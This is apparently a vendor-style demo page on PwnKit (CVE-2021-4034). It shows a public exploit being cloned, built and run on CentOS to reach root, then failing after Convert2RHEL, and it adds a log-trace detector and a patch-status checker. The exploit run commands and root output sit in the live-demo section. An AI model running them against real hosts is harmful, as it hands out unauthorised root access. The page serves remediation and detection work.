Demo_PwnKit.adoc

File metadata and controls

149 lines (96 loc) · 3.68 KB

Demo PwnKit privilege escalation and remediation

PwnKit is the name associated with CVE-2021-4034 - Pkexec Local Privilege Escalation.

There are a number of sample escalation examples available today, including

For this demo we'll show how the standard CentOS cloud images are affected by the exploit, and that once the system has been converted to RHEL the vulnerability is remediated.

This demo has been validated against the following CentOS images

Demo Pre-work

First we need a CentOS virtual machine.

For CentOS 8 we also need to update the yum repositories to point to the CentOS Vault.

ssh leapp2rhel

# wait for the login to complete

sed -i 's/^mirrorlist/#mirrorlist/g' /etc/yum.repos.d/CentOS-*
sed -i 's|#baseurl=http://mirror.centos.org|baseurl=https://vault.centos.org|g' /etc/yum.repos.d/CentOS-*

Automated Deployment

Here we use Ansible to create the user and configure the environment.

cd ansible
ansible-playbook -i hosts pwnkit.yaml

Manual environment configuration

Install the required tools into your VM and download the exploit repository.

ssh leapp2rhel

yum install gcc make git

useradd developer

# Switch to the developer user, and download the exploit repo
su - developer

# Clone the exploit code (it is built with make in the live demo below)
git clone https://github.com/luijait/PwnKit-Exploit.git

Live Demo

The flow is

  • Show the exploit exists under our developer user

  • Convert CentOS environment to RHEL with Convert2RHEL

  • Show the exploit no longer works

# Login as our developer user
ssh developer@leapp2rhel

# Clone the Git Repo
git clone https://github.com/luijait/PwnKit-Exploit.git Exploit

# Build the PwnKit Exploit
cd Exploit
make

# Confirm our user details
id
uid=1000(developer) gid=1000(developer) groups=1000(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

# Confirm we can't access the root user

sudo -i
# Should produce a response similar to
[sudo] password for developer:
developer is not in the sudoers file.  This incident will be reported.


# Now run our exploit

./exploit
Current User before execute exploit
hacker@victim$whoami: developer
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed succesfully

[root@localhost PwnKit-Exploit]# id
uid=0(root) gid=0(root) groups=0(root),1001(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

exit
logout
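A successful run like the one above is not silent: when pkexec rejects a tampered environment it writes messages to the auth log (/var/log/secure on CentOS and RHEL), which gives a detection handle independent of the exploit binary. The script below is an added example, not code from this demo repository or from the exploit's author. The log lines it writes are constructed for the example; the two message texts are the ones pkexec itself logs, including the misspelling "suscipious" as it appears in pkexec's source. Treat the exact wording and the log layout as assumptions to confirm against a real log on your own build before relying on the pattern.

```shell
#!/bin/sh
# Added example (not part of the demo repository): look for the auth-log
# traces pkexec leaves when it rejects a tampered environment.
# Assumption: these message texts match the polkit build on your host.
MSG_SHELL='The value for the SHELL variable was not found the /etc/shells file'
MSG_ENV='The value for environment variable [A-Z_]+ contains suscipious content'
TRACE_RE="pkexec\[[0-9]+\]: .*(${MSG_SHELL}|${MSG_ENV})"

# write_sample_log FILE: writes CONSTRUCTED lines in the /var/log/secure
# layout (hostname, pids, addresses and user are made up) for offline runs.
write_sample_log() {
    cat > "$1" <<'EOF'
Jan 27 10:01:12 localhost sshd[2310]: Accepted publickey for developer from 192.0.2.10 port 50122 ssh2
Jan 27 10:01:40 localhost sudo: developer : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/developer ; USER=root ; COMMAND=/bin/bash
Jan 27 10:02:05 localhost pkexec[2390]: developer: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/home/developer/Exploit] [COMMAND=(none)]
Jan 27 10:02:05 localhost pkexec[2390]: developer: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=/dev/pts/0] [CWD=/home/developer/Exploit] [COMMAND=(none)]
Jan 27 10:03:00 localhost pkexec[2412]: developer: Executing command [USER=root] [TTY=/dev/pts/0] [CWD=/home/developer] [COMMAND=/usr/bin/id]
EOF
}

# scan_pkexec_traces FILE: prints each matching line; exit 0 if any, 1 if none.
scan_pkexec_traces() {
    grep -E "$TRACE_RE" "$1"
}

# count_pkexec_traces FILE: prints the number of matching lines (0 if none).
count_pkexec_traces() {
    grep -Ec "$TRACE_RE" "$1" || true   # grep exits 1 on zero matches; keep the count
}

# Usage: ./pkexec_traces.sh [LOGFILE]   (no argument: scan the constructed sample)
if [ -n "${1:-}" ]; then
    LOG=$1
else
    LOG=$(mktemp)
    write_sample_log "$LOG"
fi
echo "pkexec environment-rejection traces in $LOG: $(count_pkexec_traces "$LOG")"
scan_pkexec_traces "$LOG" || echo "none found"
```

On a live host point it at /var/log/secure, or at the output of `journalctl _COMM=pkexec`; a legitimate `pkexec` run logs "Executing command" instead, which the pattern deliberately ignores.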

Convert CentOS environment to RHEL with Convert2RHEL

# Login as our developer user
ssh developer@leapp2rhel

./exploit
# Exploit fails

Current User before execute exploit
hacker@victim$whoami: developer
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed succesfully
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.

Report bugs to: http://lists.freedesktop.org/mailman/listinfo/polkit-devel
polkit home page: <http://www.freedesktop.org/wiki/Software/polkit>
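Running the exploit a second time shows the fix took, but a defender normally wants a check that does not depend on exploit code at all. The script below is an added example, not code from this demo repository: it reports whether the host's pkexec is still exposed by checking that the binary exists, whether it is still setuid (the bit the exploit relies on), and whether the installed polkit package's changelog references CVE-2021-4034, which is how Red Hat advises confirming the errata is applied. The decision lives in a pure function so the logic can be exercised without root or rpm. The path /usr/bin/pkexec and the interim mitigation of `chmod 0755 /usr/bin/pkexec` are assumptions taken from Red Hat's guidance, not from this page.

```shell
#!/bin/sh
# Added example (not part of the demo repository): assess CVE-2021-4034
# exposure from package and file-system facts instead of running an exploit.
# Assumptions: pkexec lives at /usr/bin/pkexec and the fixed polkit package's
# changelog names the CVE (true for Red Hat's errata builds).
PKEXEC=${PKEXEC:-/usr/bin/pkexec}

# pkexec_installed PATH -> 0 if the binary exists
pkexec_installed() { [ -e "$1" ]; }

# pkexec_setuid PATH -> 0 if the setuid bit is set (ownership is not checked here)
pkexec_setuid() { [ -u "$1" ]; }

# polkit_fixed -> 0 if the installed polkit's changelog references the CVE
polkit_fixed() {
    rpm -q --changelog polkit 2>/dev/null | grep -q 'CVE-2021-4034'
}

# yn CMD [ARGS...] -> prints yes/no from the command's exit status
yn() { if "$@"; then echo yes; else echo no; fi; }

# classify_pkexec INSTALLED SETUID FIXED (each yes/no) -> prints one status word.
# Pure function: the decision logic is testable without root or rpm.
classify_pkexec() {
    installed=$1; setuid=$2; fixed=$3
    if [ "$installed" != yes ]; then
        echo not-installed
    elif [ "$fixed" = yes ]; then
        echo patched
    elif [ "$setuid" != yes ]; then
        echo mitigated     # setuid bit removed: exploit path closed, pkexec unusable
    else
        echo vulnerable
    fi
}

# advice STATUS -> prints the recommended next step for that status
advice() {
    case "$1" in
        vulnerable)    echo "update polkit (yum update polkit) or, as an interim mitigation, chmod 0755 $PKEXEC" ;;
        mitigated)     echo "setuid bit removed; still apply the polkit errata to restore pkexec" ;;
        patched)       echo "errata applied; no action needed" ;;
        not-installed) echo "pkexec not present; nothing to do" ;;
        *)             echo "unknown status: $1"; return 1 ;;
    esac
}

# check_host -> prints the status line for this machine; returns 1 if vulnerable
check_host() {
    status=$(classify_pkexec "$(yn pkexec_installed "$PKEXEC")" \
                             "$(yn pkexec_setuid "$PKEXEC")" \
                             "$(yn polkit_fixed)")
    echo "$PKEXEC: $status -> $(advice "$status")"
    [ "$status" != vulnerable ]
}

check_host || true   # the printed status line carries the verdict
```

Run it on the CentOS VM before the conversion and again after Convert2RHEL has finished: the first run should report "vulnerable", the second "patched". If the host cannot be updated immediately, the "mitigated" state (setuid bit removed) closes the exploit path at the cost of pkexec no longer working for legitimate users until the errata is applied.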